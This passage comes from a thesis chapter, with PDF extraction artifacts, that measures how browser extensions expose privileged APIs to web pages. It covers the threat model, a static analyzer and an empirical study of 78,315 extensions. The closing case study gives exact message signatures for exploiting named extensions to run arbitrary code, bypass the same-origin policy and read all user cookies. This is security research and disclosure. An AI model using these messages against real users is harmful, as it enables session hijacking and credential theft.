identifier is ExtensionID.

// S end a n d R e ce i v e

chrome.runtime.sendMessage( ExtensionID , " H e l lo E x t en s i o n " ,

function( r e sp o ns e ) {

Received_response =res p o ns e ;

}) ;

// R ec i e ve a n d R e p ly

chrome.runtime.onMessageExternal.addListener(function( m e ss ag e ,

s en de r , s e nd R es p on s e ){

PUT(0,-845.90042)

3. METHODOLOGY 151

Received_message =message;

sendResponse(" H e ll o W e b a p pl i ca t io n " );

})

The application sends Hello Extension to the background page which replies with Hello

Web application.

2.2 Threat models

An attacker is a script that is present in a web application currently running in the user

browser. The script either belongs to the web application or to a third party. The goal

of the attacker is to interact with installed extensions, in order to access user sensitive

information. He relies on extensions whose privileged capabilities can be exploited via

an exchange of messages with scripts in the web application. We consider the following

security and privacy threats posed by extensions.

1. Execute code: these are extensions that can be exploited by the attacker to execute

arbitrary codes in the extension context. Executing code in the background page

gives the attacker access to all the capabilities of the extension. In content scripts,

the attacker can bypass SOP by making cross-origin AJAX requests, and use the

extension permanent storage for tracking purposes.

2. Bypass SOP: in this case, an attacker can exploit the capability of the extension to

make cross-origin requests without being restricted by the Same Origin Policy.

3. Read cookies: the attacker can read the user cookies and use them to mount session

hijacking attacks, access user data and take actions on her behalf.

4. Trigger downloads: the attacker exploits extensions to trigger the download of

arbitrary malicious files (software) and saves them on the user’s device without re-

quiring any action from the user. If the user inadvertently runs such software, the

attacker takes control of her device and performs malicious actions.

5. Read browsing history, bookmarks and list of installed extensions: these

information reveal the user interests and habits and can be used by the attacker for

tracking purposes, or to serve targeted and personalized advertisement.

6. Store data: the attacker can store and retrieve information in the extension storage.

This can be used for tracking purposes, even though users clear web applications

storages.

For the sake of simplicity, we often refer to the attacker as the web application in which it

runs. One can view at https://swexts.000webhostapp.com/extensions/ a set of videos

demonstrating how we exploited these threats on some Chrome extensions.

3 Methodology

We built a static analyzer that detects suspicious communications enabled by extensions

with web applications. To identify extensions that are potentially concerned with the

security and privacy threats identified in the previous section, we focus on 78,315 extensions

from Chrome, Firefox and Opera browsers. Then we manually reviewed the code of the

extensions to precisely validate the results of the static analyzer, and more importantly

to construct the signatures of the messages that have to be exchanged with extensions to

successfully exploit their capabilities. Figure 8.2 shows the analysis process.

PUT(0,-845.90042)

152 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

Figure 8.2 – Methodology - static and manual analysis

3.1 Static analysis

The goal of the static analyzer is to report only extensions that potentially pose a security

and privacy threat, in order to reduce false positives as much as possible, and reduce

the burden of the manual analysis. It has been fully written in JavaScript, using various

Node.js packages. We used Esprima [204] and Recast [228], for parsing and manipulating

JavaScript abstract syntax trees (AST), and Jsdom [69] for parsing HTML.

Unpack extensions and gather scripts We crawled extensions using SlimerJS Browser

Automation tool [130]. In the extension manifest.json file, background pages are either

declared by a set of scripts files, or an HTML file, which further includes the scripts of the

background page. UI pages are built as HTML pages, and also indicated in manifest.json

file. The Jsdom HTML parser served here to extract scripts embedded in background as

well as UI pages. Static content scripts are directly declared in the manifest.json file.

Background and UI pages can further dynamically inject content scripts in web applica-

tions, by calling the tabs.executeScript API. Those were also extracted by analyzing

the AST of background and UI pages scripts, and analyzed as other content scripts.

Parse scripts and build AST Scripts were parsed with Esprima, resulting in an AST [4],

which contains all JavaScript constructs used in content scripts, background and UI pages

scripts. Almost everything in JavaScript is an object [50]. To ease manipulation of the AST,

the following additional actions were taken to build three indexed tables of assignments

to variables and object properties (assignments), function definitions/expressions and

object methods (functions), and finally functions and object methods invocations (calls).

Basically, those are key/value pairs, in which the keys in the tables corresponded to the

names of variables, object properties and functions. Each entry was then associated with a

list of all possible values it could resolve to. For assignments, the values were all expressions

assigned to a variable or object. For function definitions and object methods, the values

were the parameters and body of the function. Finally, for function calls, the values

associated to their names in the indexed table were their invocation arguments. The

static analyzer successfully handled functions defined using the bind method, and functions

invoked using the call or apply methods.

Event handlers of page messages APIs For each message listener (See Section 2)

in content scripts, background and UI pages, we first looked up the indexed table of

function invocations (calls) to search whether the extension registered listeners for mes-

sages from the web applications (a call to addEventListener API for instance in con-

PUT(0,-845.90042)

3. METHODOLOGY 153

tent scripts). In browser contexts, all JavaScript objects are properties of a global object

named window. Different aliases, this, self, global, are sometimes used to refer to

the window object [83,154]. JavaScript object properties can be accessed using the dot

and the array or bracket notations [81]. For the sake of simplicity, we considered the

dot notation and the bracket notation when the property name was a literal (a string).

Considering the global object names (window, top, self, this), and JavaScript dot

and bracket property accesses, we generated the different ways an API can be invoked.

For instance, addEventListener can be called in 9 different ways addEventListener,

window.addEventListener, window["addEventListener"] and others. In general, we

consider that an object could be accessed in 9 different ways, its properties in 18 different

ways, the properties of its properties in 36 ways and so forth. When we found an invocation

to communications APIs in content scripts, background and UI pages, we extracted their

arguments and resolved them as follows.

For addEventListener, the first argument should be the literal message, and the second

argument a function. Otherwise, we use the indexed table of assignments and functions

to resolve them to the literal message and a function respectively. Resolving an argument

simply consist in checking whether the indexed table has an entry which key matches the

argument name, and further checking whether any of its associated values resolve to the

type and value we expect the argument to have. For addEventListener, we expect the first

argument to be a Literal and have the value message. Its second argument is expected

to be a function. We follow the same process to extract all message handlers (listeners) in

content scripts, background and UI pages.

Sensitive APIs Calls The handlers (functions) of web applications messages in extensions

are parsed to extract all their constructs. If the handlers further call other functions, those

functions are looked up using the indexed table, and their bodies parsed to also extract

their constructs. Finally, the constructs are analyzed to decide whether the extension

potentially poses any of the security and privacy threats considered in this work.

— An extension is flagged as potentially executing arbitrary code sent from web applica-

tions if it invokes functions like eval (in any part of the extension) or tabs.executeScript

(in background and UI pages).

— An extension is flagged as potentially allowing web applications to bypass SOP, if

its constructs include APIs that can be used to make AJAX calls. This includes the

creation of new XMLHttpRequest objects, calls to fetch API, or any AJAX specific

API provided by popular third party libraries such jQuery and AngularJS ($.get,

$.ajax, $.post, $http.get, $http.post).

— If the constructs include invocations to storage APIs such as storage.local.set,

storage.local.get,storage.sync.set,storage.sync.get, then the extension is

flagged as potentially storing/retrieving data for web applications.

— An extension is considered as potentially leaking user cookies, history, bookmarks,

and list of extensions to web applications if either of the following invocations were

found in their message handlers constructs: cookies.getAll, history.search,

history.getVisits, bookmarks.getTree, management.getAll, and related APIs.

— Finally, an extension is considered as probably allowing web applications to download

and save files in the user computer (device) if their messages event handlers constructs

include invocation to downloads.download.

It is worth mentioning the case of content scripts forwarding messages to background

pages. When this is the case, the constructs of content scripts messages handlers in the

background pages are also analyzed, looking for calls to any API which potentially poses

PUT(0,-845.90042)

154 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

security and privacy threats. In fact, content scripts only have access to the host and

storage capabilities. When they need access to more capabilities, they can send messages

to the background pages which may then give them access to the related capability. Con-

tent scripts can forward messages they receive from web applications, to the background

page. The latter handles the message and responds to the content scripts which in turn

respond to the application. This is particularly true in Firefox which does not allow direct

communications between web applications and background pages. Nonetheless, we have

observed many content scripts forwarding messages to background pages, even to access

APIs they can directly use from their own context.

3.2 Manual Analysis

The goal of the manual analysis was to confirm the suspicion of the static analyzer and

build the precise signatures of messages that had to be sent by web applications to exploit

extensions capabilities. Extensions reported for manual analysis were unpacked in the

browser using the CRX Extension Viewer [277]. We inspected their message handlers. If

the suspicion was confirmed, we built the signature of the messages that the extension

accepted to handle. We also identified the web applications from which the messages have

to be sent, and the targets of those messages in the case of SOP bypass.

Then we installed the extension and interacted with it, navigating to the appropriate web

applications, and interacting with the extension by sending messages from the browser

console [17] and validating that the extensions successfully replied with the requested in-

formation. For some extensions, we patched their code with hooks in the message handlers,

installed them again (in developer mode) and interacted with them to validate the results.

3.3 Limitations

Our static analysis tool suffers from many limitations. The first one is the fact that we did

not consider scopes [83], which lead to unnecessary functions being analyzed. However,

this is not a problem ultimately because all the results were further manually reviewed

to remove false positives. It also suffers from some false negatives, mainly because of

the flexibility of JavaScript that make it challenging to exhaustively address all the ways

message listeners can be invoked in extensions. Finally, for a few extensions, despite all our

efforts at the static and manual analysis levels, we could not draw any conclusion about

the potential threats they may pose.

Note also that we considered only scripts that are part of the extension packages. For

instance, background and UI pages may reference external scripts. Those scripts were not

considered in our analysis. Nonetheless, we think that extensions bundles are more likely

to contain most of the APIs that we consider in this work, as extensions developers are

recommended to avoid referencing remote scripts in extensions codes.

4 Empirical Study

We downloaded Chrome [24], Opera [108], and Firefox [58] extensions by the end of Novem-

ber 2017. The extensions were statically analyzed in the beginning of February 2018 — on

a cluster of 200 nodes mainly because of storage limitations on our own devices. This was

preceded by a long period of tests during which we improved the static analyzer, and fixed

the list of security and privacy threats. In the middle of May 2018, we did another crawl

and analysis. The results presented here are for this second dataset.

PUT(0,-845.90042)

4. EMPIRICAL STUDY 155

In this section, we first give an overview of the results, then we discuss in more details each

threat and the report extensions where it was found.

4.1 Overview

Table 8.1 presents the number of extensions we collected and analyzed. Chrome provides

the largest share of extensions, followed by Firefox and Opera. Recall that for Firefox,

we are considering only extensions built using the new WebExtensions API [156], and not

those using the XPCOM/XUL API [100].

The static analysis tool reported 3,996 suspicious extensions that we manually vetted. The

results of the manual analysis are also shown in Table 8.1. As with the share of extensions,

Chrome had the largest share of extensions with threats. In a total of 197 extensions, only

16 were found on Firefox, 10 on Opera, and the 171 others are Chrome extensions. Note

that some single extensions pose more than one threat at a time. All the 197 extensions

reported here effectively posed at least one or more of the security and privacy threats

described in Section 2. During the manual analysis, we also identified the messages to be

sent in order to exploit their capabilities. The full list of the extensions and the threats

that they pose are given in Table A.7 in the Appendix, to ease readability.

Table 8.1 – Data overview

Chrome Firefox Opera Total

Extensions analyzed 66,401 9,391 2,523 78,315

Suspicious extensions 3,303 483 210 3,996

Execute Code 15 2 2 19

Bypass SOP 48 9 6 63

Read Cookies 8 - - 8

Read History 40 - - 40

Read Bookmarks 37 1 - 38

Get Extensions Installed 33 - - 33

Store/Retrieve Data 85 2 3 90

Trigger Downloads 29 5 2 36

Total of unique extensions 171 16 10 197

Extensions installs and categories Figure 8.3 presents the distribution of users im-

pacted, or the number of installs per extension at the time of writing this thesis. Around

55% of the extensions have less than 1000 users, while the remainder 45% have thousands

of installs, showing that those threats are present in rather popular extensions, hence af-

fecting many users. About 27% of extensions have less than 100 users and another 27%

have between 100 and 1000 users. We see this as an opportunity for a tool such as ours to

help improve extensions security, as it can serve to detect potentially malicious extensions

while they are not yet very popular among users, thereby limiting their impact on users.

Table 8.2 further presents the category of these extensions. Note that the categorization

of extensions is not done the same way by Chrome, Firefox and Opera browsers. Some

categories exist only on specific browser, and not on others. Moreover, we found similar

(or the exact same) extensions being differently classified depending on the browser. We

tried to merge the different categories whenever possible.

As one can observe, Productivity is the most popular category among the reported ex-

tensions. It is also the most popular category among all Chrome and Opera extensions

we have downloaded, and also the most popular category in various datasets in recent

PUT(0,-845.90042)

156 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

studies [245,259,260]. This category does not exist on Firefox.

We were surprised by the results that only 15 extensions (7.61%) are classified as Developer

Tools. Considering the severity of the threats, we were expecting that most of them would

be extensions provided for developers to perform some controlled experiments. Since our

results represent only a lower bound of the number of extensions potentially posing these

risks, it would not be surprising that even more extensions also exhibit similar threats.

0-100 101-1000 1001-10000 10001-100000 100001+

0 10 2 0 30 40 50 60 70 80 90 100

Figure 8.3 – Distribution of the number of users per extension

Table 8.2 – Category of extensions

Category # Extensions

Productivity 81

Social & Communication 48

Fun 19

Accessibility 17

Developer Tools 15

Search Tools 6

Shopping 4

Blogging 2

Privacy & Security 2

Other 2

Appearance 1

Total 197

Extensions privilege only some web applications About 55 extensions (45, 7 and 3

on Chrome, Firefox and Opera respectively) communicate with any web applications to

give them access to extensions privileged APIs. Interestingly, on Chrome, 7 of them allow

to execute arbitrary code in the extension context, 15 of them are concerned with SOP

bypass, 26 for storing data, 2 can be exploited by any web application to read all user

cookies and 5 to read the cookies of the current web application.

The vast remainder of extensions (72.08%) can be exploited only by specific web apps

to benefit from their privileged capabilities. For instance, reading user browsing history,

bookmarks, and list of installed extensions, is enabled by extensions only to specific appli-

cations such as fliptab.io,atavi.com,mail.google.com. In particular, downloads are

allowed by many extensions (on Chrome and Opera) mostly from vk.com.

The fact that most extensions allow communications with only some specific apps can

also be explained by the fact that most of those we found allow interactions between web

apps and the background pages directly. Let us recall that it is only possible to allow

communications between background pages and specific web apps (and not all web apps).

Extensions allow to connect to arbitrary web applications If many extensions tend

to privilege specific web applications as shown previously, the exact opposite is observed

regarding the hosts extensions allow web applications to connect to, in order to access

user data. For example, 37 out of the 48 extensions that can be used to bypass SOP on

PUT(0,-845.90042)

4. EMPIRICAL STUDY 157

Chrome, give access to the user data on any other application. On Firefox, it is 6 out of

the 9 extensions which allow access to any web application data.

These two observations (extensions mostly give access to their privileged APIs only to some

web applications, and allow them to access any other web application data in the case of

SOP bypass) suggest that the access they give to their capabilities is rather deliberate.

Moreover, for the majority of extensions, the messages to send to exploit the different

APIs in extensions are so trivial that they could have only been deliberate (See Section 6).

Most privileged web applications As already mentioned, most extensions allow specific

apps to benefit from their privileged APIs. This is the case for instance of fliptab.io

where scripts can communicate with 31 very similar HD wallpaper extensions on Chrome,

that has hundreds to thousands of users. The domain vk.com can interact with 19 exten-

sions (17 on Chrome and 2 on Opera), mostly to download files on the user device. The

domain atavi.com can get access to user’s history, most visited websites (topsites) and

bookmarks thanks to 6 extensions.

Extensions which pose more than one threat All the extensions reported here pose

at least 1 of the security and privacy threats considered in this work. Nonetheless, some

extensions pose several threats.

The eRail.in [51] extension on Chrome gives access to all user cookies and allows full

SOP bypass from any web application. Moreover, it has more than 400k users. Inter-

estingly, a version of the extension exists on Firefox, but it leaks cookies and data of a

limited set of web applications (all related to the extension owner’s domain) to the the

extension’s provider own domains. Five extensions provided by Fabasoft (See Table A.4 in

the Appendix) leak the current tab cookies. As such, they allow attackers to even access

HTTPOnly cookies, and use them to mount session hijacking attacks.

Ringostat dialer [123] is the only extension that executes arbitrary code sent from app.

ringostat.com directly in its background page. All other extensions execute the arbitrary

attacker code in the context of the content scripts. Recall that the background page has

access to all the capabilities an extension declares. Interestingly, it has the host,storage,

cookies, and tabs permissions, meaning that any script present on app.ringostat.com

can access user data on any other domain, access the extension storage, cookies, open new

tabs, inject code directly in any tab, etc.

StartHQ [132] also allows to bypass SOP from starthq.com, and leaks user browsing

history. Similarly, SalesforceIQ CRM [124] allows to bypass SOP and leaks installed ex-

tensions to mail.google.com and salesforceiq.com.

Finally, user browsing history, bookmarks and installed extensions can be read by an

attacker in atavi.com and *.fliptab.io thanks to 6 and 31 extensions respectively (See

the full list in the Appendix). The latter also let fliptab.io stores and retrieves data in

the extension storage.

Cross-browser extensions It is worth mentioning that most of the extensions we found

on Opera and Firefox were also present on Chrome. While the compatibility of extensions

APIs on major browsers [2,25,100,110] let developers reach more users, attackers also

widen their attack surface because they can impact more users thanks a single cross-browser

extension. For instance, we have noticed that megatest2016, an extension provider, had

2 extensions on Chrome, and a very similar one on Opera. At the time of writing this

thesis, Chrome removed the 2 extensions (they were allowing ok.ru and other applications

to bypass SOP, but we do not know if their removal were due to the SOP bypass) while

on Opera, it is still available as MegaTest [92]. The 2 Photo Zoom for Facebook and

Facebook Photo Zoom Firefox add-ons have similar versions on Chrome, but these do not

allow SOP bypass. Similarly, the ModernDeck extension is present both on Opera [98]

PUT(0,-845.90042)

158 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

and Chrome [97]). On Opera, it allows to store/retrieve data, while on Chrome it does

not. This represent yet another problem of cross-browser extensions. While users of the

same extension suffer from security and privacy threats on one browser, on the other

browser where the extension is removed or fixed, users do not. Browser vendors, and more

importantly users would gain from security and privacy perspectives, if browser vendors

share their reviews of extensions with one another, in order to help take similar actions

like removing extensions, or updating them to remove threats they pose.

4.2 Execute code

Extensions execute in browsers with elevated privileges. From an attacker’s perspective,

being able to execute arbitrary code in an extension context also gives the attacker access to

the extension capabilities. We found 15 extensions on Chrome, 2 on Firefox and 2 on Opera

that can be exploited by web apps to execute code in their privileged context. Only one

extension on Chrome Ringostat dialer [123] executes in its background page, code that

it receives from app.ringostat.com. Then it gives access to user data on any application,

user cookies, allows code injection in in any tab the user opens, the use of the extension

storage, etc. All other extensions execute the attacker’s code in the contexts of the content

scripts. Even though content scripts have limited access to extensions capabilities, they

are not subject to SOP, can store/retrieve data, and more importantly, they have access

to the full DOM on the web applications pages in which they are injected.

The extension iwassa, present on Opera [79] and Chrome [78] allows any app to open any

URL in a new tab, and execute any code (content script) in it. If the code in the context of

the content script can already access any application data, one can further inject specific

content in the DOM of the new tabs opened, to exfiltrate for instance any token/secret

present in the application DOM. In fact, in addition to cookies, many sensitive applications

use tokens to further perform additional checks about the origins of requests before letting

users perform sensitive actions on their data.

Another interesting example is that of the LinkClicker extension also present on Opera [88]

and Chrome [87]. It allows any application to send a code which will be further injected in

any new tab the user opens during the current browsing session. One can use it to track

the user while she is browsing, gather any credentials that she is providing to log into any

application, and exfiltrate those to the attacker.

In many of these cases, the problem is due to the fact that the extension does not correctly

sanitize the codes received from web applications, allowing attackers to execute arbitrary

codes. A good example is that of the GureTV: To watch television extension on Fire-

fox [67]. It did well to sanitize content sent from web applications, but not content sent

from iframes embedded in the applications. Hence, one can create an iframe, and send an

arbitrary code which will be executed in the context of the content scripts.

Many of the other extensions work similarly, and allow (at least) to access arbitrary user

data on any application, and/or store and retrieve data (when they have the appropriate

permissions).

4.3 Bypass SOP

Extensions are not subject to the SOP, and therefore have access to user data on any web

application for which they have declared the host permission. Through message exchanges

with extensions, 48, 9 and 6 of extensions on Chrome, Firefox and Opera respectively, allow

web applications to bypass SOP by accessing user data on any other web application. As for

other threats, the trend is rather to allow only some web applications to bypass SOP, even

PUT(0,-845.90042)

4. EMPIRICAL STUDY 159

though 15 of such Chrome extensions allow any application to access any other application

data. Hence, the majority of arbitrary SOP bypass can be exploited by specific web

applications, including: ok.ru,mail.google.com,logincat.com, etc. Interestingly, when

SOP bypass is possible, in most of the cases the data of all domains can be accessed. On

Chrome for instance, it is 37 out of the 48 extensions that allow access to any application

data. Even when the SOP bypass is partial, it is enabled to rather sensitive domains. For

instance, 5 extensions out of 11 allow SOP bypass to users’ Google accounts: salesmate.io,

appspot.com and aliexpress.com can access users Gmail account. One extension [89]

allows access to the linkedin.com data of more than 400k users from Gmail, and blog.

renren.com can access github.com [120].

4.4 Cookies

We found 8 Chrome extensions that can be exploited by web applications to read user

cookies: 2 of them allow any web application to read all user cookies [51,133], 1 only allow

app.ringostat.com [123] to read all user cookies, and the other 5 of them allow an attacker

script to read the cookies of the tab in which it executes. The number of users affected is

very important (more than 415k for eRail.in [51], 9.6k for Telerik Test Studio Chrome

Playback 2014.1 [133] and 78 for Ringostat dialer [123]. Cookies can be used to hijack

users browsing sessions, access their data and take actions on their behalf. It is worth

mentioning that the three extensions that can be exploited to read all user cookies, have

probably been poorly programmed. It is more likely that the ability to read cookies was

meant to be used from specific web applications, but unfortunately the extensions were

poorly programmed, allowing other web applications to also get access to user cookies.

In particular, the Ringostat dialer [123] extension did not expose any means to get

user cookies. But it allows to execute any code sent from app.ringostat.com in the

extension background page context (using eval function), giving the application access to

all the capabilities of the extension. Among those, the cookies, storage and arbitrary host

permissions, and the ability to open tabs, inject and execute arbitrary code in them, etc.

We found that the web application https://erail.in/ is effectively reading all user cook-

ies when the eRail.in [51] Chrome extension is installed. This means that the extension

is intentionally given access to user cookies to https://erail.in. However, it is not clear

whether the cookies of interest were only those of https://erail.in or any cookie or if

only cookies of https://erail.in/ were meant to be leaked. Unfortunately, any web app

can access all user cookies stored by any web application, and use them to hijack user

sessions. Interestingly, the extension has a version on Firefox, where the cookies which are

leaked are only those of domains related to erail.in and are leaked only to erail.in and

eair.in.

The case of the extension Telerik Test Studio Chrome Playback 2014.1 [133] is partic-

ularly interesting, as one has to setup complex interactions, involving the extension content

scripts and background page, as well as the application and its server. In particular, the

interactions are triggered from the web application, but the cookies are sent to the server

of the application instead of being returned directly to the application. Following the same

mechanism, one can clear cookies, delete user browsing history, etc. A similar extension is

also available on Firefox progress-test-studio-extension. Unfortunately, we could not

analyze it as it was not downloading.

Finally, 5 Fabasoft extensions (See more details in Table A.4 in the Appendix) allow the

attacker to read the current tab cookies of any web application. Even though a web

application protects its cookies with the HTTPOnly flag [74], an attacker script running

PUT(0,-845.90042)

160 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

in the web application bypasses this protection by obtaining the cookies via the extension.

It can further use them to mount session hijacking attacks against the user.

4.5 Downloads

Exploiting extensions to trigger the download of arbitrary files is enabled mainly from

specific applications including vk.com (See Table A.2 in Appendix) and ok.ru. Only 2

extensions on Chrome and 3 on Firefox allow downloads from arbitrary web apps. The

main purpose of the related extensions were to allow the download of music and videos.

Sometimes, they would even suffix the downloaded file name by .mp3 or .mp4. Nonetheless,

we have been able to exploit these extensions in order to trigger the download of arbitrary

files and save them in the user’s device. An attacker can also do so to download malicious

software, which when inadvertently executed by the user, may allow the attacker to take

control of their computer and perform malicious actions.

It is worth mentioning that none of these extensions required user action to trigger the

downloads. One of them, multiDownloader [101] even overwrites a file if it is already

present on the user’s device.

It is also worth mentioning the case of the Chrome repl.it download extension [121]. It

is a helper extension for the https://repl.it application used for creating and running

programs in different languages online. The extension allows to save the code being created.

Even though the extension prompts the user to confirm the file name (default is program.),

the content of the file can be fully arbitrary. As such, an attacker can trick the user in

saving the code being edited, while a completely different content is saved.

4.6 History, bookmarks, and list of installed extensions

Two providers distinguish themselves with regards to extensions that can be exploited

to get access to user browsing history, bookmarks and list of extensions. On Chrome,

fliptab.io [68] provides 31 very similar HD wallpapers extensions (See the full list in

Appendix), and allows fliptab.io to get all browsing history, bookmarks and the list of

user installed extensions. Each of these extensions has between a hundred and 25k users.

Furthermore, six extensions provided by atavi.com also provide the same privileges to

pages at atavi.com and atavi.test. One of them, Atavi - bookmark manager [13] has

more than 96k users.

Additionally, Browser History [18] leaks user browsing history to www.americaninternetmatrix.

com/history. Finally, StartHQ [132] leaks browsing history to https://starthq.com.

Other extensions that give access to the list of extensions include Boomerang for Gmail [15]

(with more than 1.5 million users) to mail.google.com and SalesforceIQ CRM [124], to

mail.google.com and salesforceiq.com.

4.7 Store/retrieve data

About 85 extensions can be exploited by various web applications to store and retrieve

data. On Chrome, 26 of these extensions give any application access to their storage.

Others give specific apps access to their storage. For instance, fliptab.io can store

data in the user’s browser thanks to its 31 extensions. The domain netflix.com is also

able to store data thanks to 3 extensions, and mail.google.com to do so thanks to 2

extensions. The extensions ISOGG Y-Tree AddOn [77] and PhyloTreeMT AddOn [114] are

from the same provider, even though the web applications they allow to persist data are

respectively isogg.org and phylotree.org.

PUT(0,-845.90042)

5. TOOL FOR ANALYZING MESSAGE PASSING APIS 161

Recall that extensions storage is persistent and not affected by the clearing of browsing data

(web application cookies, storages, ...). As such, they represent a resilient storage which

can be used to bypass user privacy preferences and uniquely identify them even though

they have cleared their cookies. Interestingly, some extensions propose to sync data they

store on all the devices the user is logged into. For instance, if a user logs into multiple

devices with the same extension installed, then syncing storages lets an application tracks

her accross all her devices.

4.8 Other threats

For SOP bypass, we have reported here the cases where web applications can access ar-

bitrary data on other web applications. Nonetheless, we found many extensions allowing

to access some predefined data of other web applications. This also represents a SOP

bypass (since web applications cannot access such data with their normal privileges). Fi-

nally, we found some Opera and Chrome extensions (like the 31 HD wallpaper extensions

by fliptab.io), and some not reported here) which allow web applications to clear user

browsing data including cookies (or even set/get cookies of some specific domains), his-

tory, bookmarks, cache, stored passwords, or enable/disable/uninstall extensions. We do

not include such cases in this thesis.

5 Tool for analyzing message passing APIs

We provide online at https://swexts.000webhostapp.com/extsanalyzer/, a tool for an-

alyzing the message passing APIs of extensions. The only difference with the version used

in this work is that it does not handle dynamically injected content scripts. This was done

for simplicity reasons. That notwithstanding, in order to analyze dynamic content scripts,

one can simply declare them in the extension manifest as static content scripts.

Listing 8.1 shows the result produced by the tool when applied to the eRail.in Chrome

extension [51].

{

" c om _ vi a _c s ": {

"to_back": {

" b ac k " : {

" a ja x " : {

" $ .g et " :" " ,

"$.post":" " ,

"$.ajax":" " ,

"XMLHttpRequest":" "

"cookies": {

"chrome.cookies.getAll":" " ,

"chrome.cookies.remove":" " ,

"cookies":" "

}

Listing 8.1 – Result of analyzing the erail.in extension

PUT(0,-845.90042)

162 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

—com_via_cs implies that webpages can communicate with the extension via the con-

tent scripts, by using the postMessage API. This extension has only 1 content script.

When there are multiple content scripts, the tool analyzes each of them independently

and produces results corresponding to each of them.

—to_back indicates that the messages sent by webpages to the content script are

forwarded to the extension background page.

— The tool found that two sensitive APIs are reached in the background page: AJAX re-

quests with calls to the jQuery AJAX APIs ($.get, $.post, $.ajax) and access to

cookies with invocation to the chrome.cookies.getAll and chrome.cookies.remove

APIs.

The main goal of the tool is to raise awareness about the fact that an attacker may po-

tentially get access to the extension’s privileged APIs. One can then further review the

code to validate or refute the results of the tool. For instance, after manually vetting the

code of the eRail.in extension, we effectively confirm that any webpage can access all

user cookies and make AJAX request to any domain. See Section 6for more details about

examples of messages to be sent to extensions to benefit from their privileged capabilities.

There is room for further improving the tool. Lessons can be learnt from the state-of-

the-art on JavaScript static analysis tools in order to improve the extraction of messages

passing listeners and tracking the escalation of extensions sensitive APIs. The set of threats

considered in this work can also be extended further with state-of-the-art extensions threats

in the literature. Finally, our ultimate goal is to make the tool usable by everybody. By

providing the name of a Chrome, Firefox or Opera extension, the tool would automatically

download and analyze it for different threats and output a score as well as a non-technical

explanation about the potential threats that an extension may pose. For extensions that

have been manually vetted (as the ones found in our empirical study), the tool can therefore

provide a precise report about the threats they pose and warn the user about whether the

extension is malicious or not and thus if it is safe to install it.

6 Case study

In this section, we show how an attacker can exploit the capabilities of an extension by

sending the appropriate message. In order to gain access to privileged browser features

via an extension, an attacker first needs to ensure that the extension is installed and

enabled. Many recent studies discussed extensions discovery, using for instance their unique

identifiers and web accessible resources [245,249] or DOM specific changes they introduce

in web pages [260]. This is not really needed here. Knowing the structure of messages

extensions respond to, is sufficient. If the extension is present, it will surely reply. To

benefit from extensions capabilities, it is sufficient that the attacker is present in a web

application with which the extension can interact. We recorded videos demonstrating

some extensions and the threats discussed in this study. They are accessible at https:

//swexts.000webhostapp.com/extensions/.

6.1 Example of messages to send to extensions

We refer to Section 2which presents the message passing APIs between webpages and the

different components of an extension. We illustrate at least each threat by an extension.

Execute code in content scripts context Listing 8.2 present the structure of messages

that can be sent from any webpage to the jianlibao [84] Chrome extension to execute

PUT(0,-845.90042)

6. CASE STUDY 163

arbitrary code in the context of its content scripts. Replace CODE with real JavaScript code,

then serialize the message using JSON.stringify before sending it. The extension has the

storage and host permissions meaning that any page can bypass SOP and get access

to user data on any domain, store data in the extension storage and later retrieve it for

tracking purposes. Moreover, the code is injected in the active tab the user is interacting

with. As the user may switch tabs at any time, one can send the code regularly (say

every second) in order to ensure that it is injected in all the web applications the user is

interacting with. Since content scripts have access to the DOM of webpages, the injected

code also has full access to the active tab DOM, giving it the ability to undertake any

action: recording user name and password, credit card numbers, emails, etc.

{

type : " g e tR e su me I nf o " ,

downloadObj: {

resumeWhereabouts: 5

context: {

contentScript: CODE ,

jsM e t ho d : "console.log"

}

Listing 8.2 – Executing arbitrary code in the context of the content scripts of the

current tab the user navigates to, thanks to the jianlibao Chrome extension.

Extensions such as iwassa [78,79] or LinkClicker [87,88], present on Chrome and Opera,

even allow to send a URL and a code. They will open the URL in a new tab, and execute

the code in the context of the content scripts injected by the extension in the new tab.

Listing 8.3 presents the case of the iwassa extension. Replace URL with the URL of the

page to open in a new tab, and CODE with the real code to be executed in the context of

the new tab content scripts.

{

from : " l o gi ni n fo " ,

v al : [ U R L , CODE ," L o gi n AP I " ]

}

Listing 8.3 – Executing code in the context of a choosen tab thanks to the iwassa

extension present on Chrome and Opera. URL is the URL of the page to open in a new

tab, and CODE the code to be executed.

The extension also has the host permission, allowing to make AJAX requests to any

domain.

Execute code in background page context Background pages are the most privileged

contexts, as they have access to all the capabilities of an extension. Listing 8.4 shows the

message to send to the Ringostat dialer [123] Chrome extension to execute arbitrary code

in the context of its background page. Interestingly, this extension has the host,storage,

cookies and tabs permission, giving an attacker the ability to bypass SOP, store data

in the extension storage, manage user cookies and tabs (open new tabs, close some, etc.).

Messages are to be sent from webpages which URLs match *://app.ringostat.com/*.

{

message: "execCommand",

data : {

PUT(0,-845.90042)

164 CHAPTER 8. COMMUNICATIONS EXTENSIONS - WEB APPLICATIONS

command: " e va l " ,

params: CODE

}

Listing 8.4 – Message to send to Ringostat dialer background page to execute

arbitrary code. Replace CODE with the real code to be executed.

Bypass SOP Here we take the example of the Buxenger extension, available both on

Chrome and Firefox. Listing 8.5 shows the structure of messages to be sent to the extension

in order to make AJAX requests to any domain (SOP bypass). The case shown here, is for

making HTTP GET requests. But the extension also allows to make AJAX requests using

HTTP POST, DELETE, PATCH methods.

{

message: " a j ax - g et " ,

url: UR L ,

callbackId: ID

}

Listing 8.5 – Make arbitrary AJAX requests thanks to the Buxenger extension present

on Chrome and Firefox. Replace URL with the URL of the data to access, and ID with

any value.

Retrieve cookies Listing 8.6 shows the case of the eRail.in Chrome extension which

allows any webpage to retrieve the list of user cookies.

{ Action: " G ET C OO KI E " }

Listing 8.6 – Message to send to erail.in extension in order retrieve all user cookies

This includes any cookies, such as the user authentication cookies set after she has logged

into web applications. One can further use the cookies to mount session hijacking attacks.

The extension also allows to make arbitrary AJAX requests, by sending messages as shown

in Listing 8.7

{

Action: " G ET _ BL OB " ,

URL: URL

}

Listing 8.7 – Making AJAX requests thanks to the eRail.in Chrome extension

Downloads files Listing 8.8 shows the signature of messages to send from any webpage,

